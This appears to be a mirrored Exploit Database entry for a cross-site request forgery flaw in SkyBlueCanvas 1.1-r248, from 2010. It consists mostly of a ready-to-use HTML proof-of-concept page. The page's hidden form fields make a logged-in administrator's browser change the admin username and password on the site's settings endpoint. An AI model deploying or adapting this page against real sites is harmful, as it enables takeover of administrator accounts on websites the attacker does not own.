Skybluecanvas 1.1-r248 – Cross-Site Request Forgery

• Exploit Database
• 15 阅读

• 作者： Sweet
  日期： 2010-09-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15080/

• 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  1[+]Exploit Title: Skybluecanvas.v1.1-r248 CSRF vulnirabilitie 0
  0[+]Date: 022/09/20101
  1[+]Author: Sweet0
  0[+]Contact : charif38@hotmail.fr0
  1[+]Software Link: www.skybluecanvas.com 0
  0[+]Download: www.skybluecanvas.com/downloads.html 1
  1[+]Version:v1.1-r2480
  0[+]Tested on: Backtrack 4 1
  1[+]Risk : Hight 0
  0[+]Description :0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  ----=PoC=----
  <html>
  <body>
  <h3>Skybluecanvas.v1.1-r248 CSRF vulnirabilitie</h3>
  <form method="POST" name="form0" action="http://target.com/path/admin.php?mgroup=settings&mgr=password&objtype=password">
  <input type="hidden" name="id" value="1"/>
  <input type="hidden" name="username" value="admin"/><!-- User name -->
  <input type="hidden" name="password" value="password"/> <!-- your password-->
  <input type="hidden" name="confirm" value="password"/><!-- confirm password -->
  <p> Press Continue to update admin information <input type="submit" name="submit" value="Continue"/> </p>
  </form>
  <form method="GET" name="form1" action="http://target.com/path/admin.php?mgroup=settings&mgr=password&objtype=password">
  <input type="hidden" name="name" value="value"/> 
  </form>
  <form method="GET" name="form2" action="http://target.com/path/admin.php">
  <input type="hidden" name="name" value="value"/> 
  </form>
  <form method="GET" name="form3" action="http://target.com/path/admin.php?mgr=login&js=1">
  <input type="hidden" name="name" value="value"/> 
  </form>
  </body>
  </html>
  
  
  (thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P, inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org
  
  
  et 1,2,3 viva L'Algerie :))